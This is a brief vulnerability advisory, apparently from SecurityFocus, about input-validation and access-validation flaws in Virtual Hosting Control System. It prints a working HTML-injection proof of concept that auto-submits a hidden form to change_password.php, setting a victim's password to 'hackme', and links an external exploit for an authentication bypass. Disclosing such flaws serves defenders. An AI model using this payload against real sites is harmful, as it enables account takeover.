Virtual Hosting Control System Multiple Input Validation And Access Validation Vulnerabilities

An exploit is not required.

The following proof of concept for the HTML injection issue is available:

</form><form name="dsr" method="post" action="ch%61nge_password.php"><input name="pass" value="hackme"><input name="pass_rep" value="hackme"><input name="uaction" value="updt_pass"></form><script>document.dsr.submit()</script>

The following exploit for the authentication bypass is available:

http://www.rs-labs.com/exploitsntools/rs_vhcs_simple_poc.html


 

Copyright 2010, SecurityFocus